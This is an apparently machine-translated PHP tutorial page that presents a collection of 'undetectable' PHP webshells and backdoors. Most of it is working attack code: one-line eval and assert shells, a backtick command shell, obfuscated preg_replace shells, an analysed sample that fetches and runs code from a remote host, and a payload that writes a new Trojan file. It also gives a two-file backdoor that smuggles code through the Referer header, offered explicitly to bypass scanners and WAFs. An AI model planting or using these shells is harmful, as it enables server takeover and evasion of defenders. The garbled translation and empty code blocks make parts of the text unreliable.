Home > Backend Development > PHP Tutorial > Teach you how to identify simple PHP backdoors without checking and killing, PHP backdoors without checking and killing_PHP Tutorial

Teach you how to identify simple PHP backdoors without checking and killing, PHP backdoors without checking and killing_PHP Tutorial

WBOY
Release: 2016-07-12 09:08:25
Original
1191 people have browsed it

Teach you how to identify a simple PHP backdoor without checking and killing, and PHP backdoor without checking and killing

One of the most common one-sentence backdoors may be written like this

<&#63;php @eval($_POST['cmd']);&#63;>
Copy after login

or this

<&#63;php @assert($_POST['cmd']);&#63;>
Copy after login

Student tudouya gave [a construction technique] on FREEBUF using

Copy code The code is as follows:

Construction generation, of course, if it is too intuitive, you can write it like this

Copy code The code is as follows:

Then fill in some ordinary code to disguise it, and a simple "anti-kill" shell sample appears

Let’s take a look at what is known as the easiest PHP backdoor in history

Go directly to the code:

<&#63;php
 
$c=urldecode($_GET['c']);if($c){`$c`;}//完整
 
!$_GET['c']||`{$_GET['c']}`;//精简
 
/*******************************************************
 * 原理:PHP中``符号包含会当作系统命令执行
 * 示例:http://host/&#63;c=type%20config.php>config.txt
 *    然后就可以下载config.txt查看内容了!
 *    可以试试更变态的命令,不要干坏事哦!
 *******************************************************/



Copy after login

The implementation principle is that PHP will directly parse the content contained in the ` symbol (note: not single quotes) into system commands for execution! This way you can expand freely and abnormally!

Let’s look at the same simple piece of code

<&#63;php 
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft"); 
&#63;> 
Copy after login

Password page

Recently captured a webshell sample based on PHP. Its ingenious dynamic code generation method and cumbersome self-page disguise method made us feel a lot of fun in the process of analyzing this sample. Next, let us enjoy this wonderful Webshell together.

Webshell code is as follows:

<&#63;php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s&#63;%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
&#63;>
Copy after login

The key is to look at the following code,

Copy code The code is as follows:
sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

After execution here, it is actually a picture. The decrypted picture address is as follows:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85
Then call the file_get_contents function to read the image into a string, then substr takes the content after 3649 bytes, and then call gzuncompress to decompress to get the real code. Finally, the modifier e of preg_replace is called to execute the malicious code. Execute the following statement here to restore the malicious sample code,

Copy code The code is as follows:
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));
?>

Hide PHP without features in one sentence:

   <&#63;php 
session_start(); 
$_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); 
$_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' ); 
&#63;>
 
Copy after login

Assign the content of $_POST['code'] to $_SESSION['theCode'], and then execute $_SESSION['theCode']. The highlight is that there is no feature code. If you use a scanning tool to check the code, it will not alarm you, and you have achieved your goal.
Super hidden PHP backdoor:

<&#63;php $_GET [a]( $_GET [b]);&#63;>
Copy after login


Just using the GET function constitutes a Trojan horse;
How to use:
​ ?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};

After execution, the current directory will generate a c.php one-sentence Trojan. When the parameter a is eval, an error will be reported that the Trojan horse generation failed. When it is assert, the same error will be reported, but the Trojan will be generated. It is really not to be underestimated. It is a simple sentence. , is extended to such applications.
Hierarchical request, coded to run PHP backdoor:
This method is implemented in two files, file 1

 <&#63;php 
//1.php 
header( 'Content-type:text/html;charset=utf-8' ); 
parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a ); 
if (reset( $a ) == '10' && count ( $a ) == 9) { 
eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6))))); 
} 

&#63;>

Copy after login

File 2

 <&#63;php 
//2.php 
header( 'Content-type:text/html;charset=utf-8' ); 
//要执行的代码 
$code = <<<CODE 
phpinfo(); 
CODE; 
//进行base64编码 
$code = base64_encode ( $code ); 
//构造referer字符串 
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ; 
//后门url 
$url = 'http://localhost/test1/1.php ' ; 
$ch = curl_init(); 
$options = array ( 
CURLOPT_URL => $url , 
CURLOPT_HEADER => FALSE, 
CURLOPT_RETURNTRANSFER => TRUE, 
CURLOPT_REFERER => $referer
); 
curl_setopt_array( $ch , $options ); 
echocurl_exec( $ch ); 

&#63;>


Copy after login

Use HTTP_REFERER in the HTTP request to run the base64-encoded code to achieve the backdoor effect. Generally, WAF has a looser or no detection of referer. It is good to use this idea to bypass waf.

We treat these PHP backdoor programs with a learning attitude. Many PHP backdoor codes let us see how well-intentioned the programmers are.

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/1054514.htmlTechArticleTeach you how to identify simple PHP backdoors without checking and killing. The most common one-sentence backdoor may be Write like this php @eval($_POST['cmd']); or like this php @assert($_POST['cmd']); tud...
Related labels:
php
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template